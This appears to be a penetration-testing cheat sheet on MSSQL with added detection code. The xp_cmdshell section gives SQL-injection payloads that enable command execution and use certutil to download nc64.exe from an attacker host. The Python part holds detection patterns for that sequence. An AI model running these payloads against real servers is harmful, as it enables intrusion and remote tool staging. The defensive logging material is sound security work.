MSSQL

SQLCMD

A Windows built-in command-line tool that allows SQL queries to be run from the Windows command prompt, either locally or remotely against another machine.

Impacket-MSSQLClient

Impacket includes a tool (impacket-mssqlclient) that can be used to connect to a Windows machine running MSSQL. Be sure to use the -windows-auth flag to authenticate with NTLM instead of SQL Server authentication.

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

MSSQL Console Commands

When using an SQL Server command-line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. However, when running queries remotely with a client such as impacket-mssqlclient, we can omit GO: it is a client-side batch separator, not part of the MSSQL TDS (Tabular Data Stream) protocol, so the server never sees it.
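To make the batch-separator point concrete, here is an added example (not code from the original page) of how a sqlcmd-style script is cut into batches client-side: only a line consisting solely of GO (optionally with a repeat count, as in GO 2) separates batches, and the text of each batch is all the server ever receives. The sample script is constructed for the example.

```python
import re

# Matches a sqlcmd batch separator: GO alone on a line, optionally followed by a
# repeat count ("GO 3" runs the preceding batch three times). Case-insensitive.
GO_LINE = re.compile(r"^\s*GO(?:\s+(\d+))?\s*$", re.IGNORECASE)

def split_batches(script: str):
    """Split a sqlcmd-style script into (batch_text, repeat_count) tuples.

    GO is handled by the client; the server only ever sees the text between
    separators, which is why a remote client that sends one statement at a
    time never needs it.
    """
    batches = []
    current = []
    for line in script.splitlines():
        m = GO_LINE.match(line)
        if m:
            text = "\n".join(current).strip()
            if text:
                batches.append((text, int(m.group(1) or 1)))
            current = []
        else:
            current.append(line)
    # A trailing batch with no GO after it is still sent when the script ends.
    tail = "\n".join(current).strip()
    if tail:
        batches.append((tail, 1))
    return batches

# Constructed sample script (not from the page). The last line shows that GO
# inside a statement is NOT a separator; only a line made solely of GO is.
SAMPLE_SCRIPT = """\
SELECT @@version;
GO
SELECT name FROM sys.databases;
go 2
SELECT 'GO' AS not_a_separator;
"""

if __name__ == "__main__":
    for text, n in split_batches(SAMPLE_SCRIPT):
        print(f"batch x{n}: {text}")
```

Running the script prints three batches, the second with a repeat count of 2.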

Show MSSQL version:

SELECT @@version;

List all available databases:

SELECT name FROM sys.databases;

List tables in a database:

SELECT * FROM tampdb.information_schema.tables;

List all elements in a table:

We must specify the dbo schema between the database name and the table name.

RCE with xp_cmdshell

  1. 1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE--

  2. Then: 1';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.x/nc64.exe c:/windows/temp/nc64.exe';--

  3. If you do not get a hit on your web server, let me know.

Note that both sp_configure changes require the ALTER SETTINGS server-level permission (held by the sysadmin and serveradmin roles), and each RECONFIGURE writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" entry to the SQL Server error log, which is a reliable place for defenders to catch this sequence.
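From the defender's side, the enable-then-execute sequence above leaves two kinds of evidence: the SQL Server ERRORLOG records every sp_configure change, and captured batch text (from an Extended Events session or SQL Audit) contains the sp_configure and xp_cmdshell calls themselves. The following added example, which is not part of the original page, parses constructed ERRORLOG lines in SQL Server's standard format and flags enablement of xp_cmdshell and two other commonly abused options, and separately flags captured T-SQL that enables or calls xp_cmdshell. The sample log lines and the WATCHED_OPTIONS set are my own choices for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in SQL Server ERRORLOG format (not taken from the page).
# SQL Server writes a "Configuration option ... changed" entry every time
# sp_configure + RECONFIGURE flips a setting, including xp_cmdshell.
SAMPLE_ERRORLOG = """\
2024-05-01 10:22:30.90 spid55      Starting up database 'tampdb'.
2024-05-01 10:22:31.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:22:31.15 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:40:02.01 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement is almost always worth an alert on a production instance
# (set chosen for this example).
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}

@dataclass
class ConfigChange:
    ts: str
    spid: str
    option: str
    old: int
    new: int

def parse_config_changes(log_text: str) -> list:
    """Extract every sp_configure change recorded in ERRORLOG text."""
    changes = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            changes.append(ConfigChange(m["ts"], m["spid"], m["option"],
                                        int(m["old"]), int(m["new"])))
    return changes

def find_enablements(log_text: str) -> list:
    """Return only 0 -> 1 transitions of watched options; disabling is not alerted."""
    return [c for c in parse_config_changes(log_text)
            if c.option in WATCHED_OPTIONS and c.old == 0 and c.new == 1]

# Patterns for captured batch text: the enable call and any direct xp_cmdshell
# invocation. The lookbehind keeps the quoted option name in sp_configure from
# also counting as an invocation.
QUERY_PATTERNS = {
    "enable_xp_cmdshell": re.compile(r"sp_configure\s+N?'xp_cmdshell'\s*,\s*1\b", re.IGNORECASE),
    "xp_cmdshell_call": re.compile(r"(?<!')\bxp_cmdshell\b\s*(?:N?'|@)", re.IGNORECASE),
}

def flag_query(sql: str) -> list:
    """Names of the query patterns that match a captured T-SQL batch."""
    return [name for name, pat in QUERY_PATTERNS.items() if pat.search(sql)]

if __name__ == "__main__":
    for c in find_enablements(SAMPLE_ERRORLOG):
        print(f"{c.ts} {c.spid}: '{c.option}' enabled")
    print(flag_query("1';EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE--"))
```

On the sample log this reports exactly one event, the 0 to 1 change of xp_cmdshell by spid55, and ignores the later 1 to 0 change; correlating the spid with the login recorded in the SQL Audit or Extended Events session tells you which account made the change.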
